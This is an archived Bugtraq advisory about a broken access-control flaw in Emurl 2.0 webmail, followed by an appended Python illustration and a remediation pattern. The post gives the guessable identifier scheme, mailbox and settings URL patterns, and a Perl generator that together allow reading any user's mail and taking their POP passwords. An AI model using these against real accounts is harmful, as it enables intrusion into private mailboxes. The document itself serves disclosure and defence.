Bugtraq mailing list archives
Vulnerability in EMURL-based e-mail providers
From: pbenoit () MAIL COM (Pierre Benoit)
Date: Mon, 15 May 2000 12:33:23 -0400
Affected Product: Emurl 2.0 For Windows NT 4.0 (possibly others)

Product information: Emurl is a web-based email host developed by SeattleLab.
http://www1.seattlelab.com/emurl/

Impact: Users can access the mailbox contents of anybody on the system. They can also steal their POP passwords, since Emurl allows you to fetch your POP email from more than one source.

Description: After logging into my new mail account powered by the Emurl software, this URL struck me:

  http://www.somesite.com/scripts/emurl/RECMAN.dll?TYPE=RECIEVEMAIL&USER=113100104114116111123

I guess you all know where this is going. First, this identifier is based solely on your account name. Therefore, if you create an account with the same name on another site, you'll end up with the very same identifier. Furthermore, this identifier can easily be determined since it is "encoded" using the ASCII value of each character of the account's name, incremented by its position. In this example, my user ID would be PBenoit and my resulting identifier would be 113100104114116111123.

  p = 112 + 1 = 113
  b =  98 + 2 = 100
  e = 101 + 3 = 104
  n = 110 + 4 = 114
  o = 111 + 5 = 116
  i = 105 + 6 = 111
  t = 116 + 7 = 123

You could fetch the e-mails here:

  http://www.somesite.com/scripts/emurl/RECMAN.dll?TYPE=RECIEVEMAIL&USER=<identifier>

... and view/change the account's settings here:

  http://www.somesite.com/scripts/emurl/MAKEHTML_M.dll?TYPE=USER&USER=<identifier>

I threw a few lines of perl together to generate this.

  print "Enter your ID: ";
  $_ = lc(<STDIN>);                 # lowercase the name (PBenoit -> pbenoit)
  chomp;
  print "Your identifier is: ";
  @letters = split(//, $_);
  for ($i = 0; $i < length($_); $i++) {
      $mychar = ord($letters[$i]) + $i + 1;           # ASCII value plus 1-based position
      if ($mychar < 100) { $mychar = (0).$mychar; }   # zero-pad to three digits
      print $mychar;
  }

Vendor status: SeattleLab is aware and the issue is addressed in their next version.
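The following is an added example in Python, not code from the post or from SeattleLab. It reproduces the identifier scheme described above to show two properties a defender should care about: the identifier is fully determined by the account name (so it collides across sites and is guessable), and it is a reversible encoding rather than a secret (so any URL that lands in a proxy or web-server log reveals the account name). The SessionStore class is an assumed remediation pattern, not EMURL's actual fix: a random per-login token with the token-to-account mapping kept server-side.

```python
import secrets


def emurl_identifier(account_name: str) -> str:
    """Identifier scheme as described in the advisory: lowercase the name, then
    encode each character as its ASCII value plus its 1-based position,
    zero-padded to three digits (this reproduces the post's worked example)."""
    name = account_name.lower()
    parts = []
    for position, ch in enumerate(name, start=1):
        value = ord(ch) + position
        parts.append(f"{value:03d}")   # values below 100 get a leading zero
    return "".join(parts)


def account_name_from_identifier(identifier: str) -> str:
    """Invert the scheme. Because every step is reversible, the identifier
    hides nothing: the account name can be read back from any logged URL."""
    if len(identifier) % 3 != 0 or not identifier.isdigit():
        raise ValueError("identifier must be a run of three-digit groups")
    chars = []
    for index in range(0, len(identifier), 3):
        position = index // 3 + 1
        chars.append(chr(int(identifier[index:index + 3]) - position))
    return "".join(chars)


def identifiers_collide(name_a: str, name_b: str) -> bool:
    """True when two names (possibly on different sites) map to one identifier."""
    return emurl_identifier(name_a) == emurl_identifier(name_b)


class SessionStore:
    """Assumed remediation pattern (hypothetical, not the vendor's): a mailbox
    handle that is random per login and meaningless without the server-side
    table, so it cannot be derived from, or decoded into, an account name."""

    def __init__(self):
        self._sessions = {}

    def issue(self, account_name: str) -> str:
        token = secrets.token_urlsafe(32)   # 256 bits from the OS CSPRNG
        self._sessions[token] = account_name
        return token

    def resolve(self, token: str):
        """Return the account bound to a token, or None for an unknown token."""
        return self._sessions.get(token)


if __name__ == "__main__":
    ident = emurl_identifier("PBenoit")
    print("identifier:", ident)
    print("recovered name:", account_name_from_identifier(ident))
    store = SessionStore()
    print("random handle:", store.issue("pbenoit"))
```

Running the block prints the same identifier the post shows for PBenoit, recovers the name from it, and then prints a random handle that differs on every login; the contrast is the whole point, since the weakness is not the lack of encryption but the fact that the handle is a function of public information.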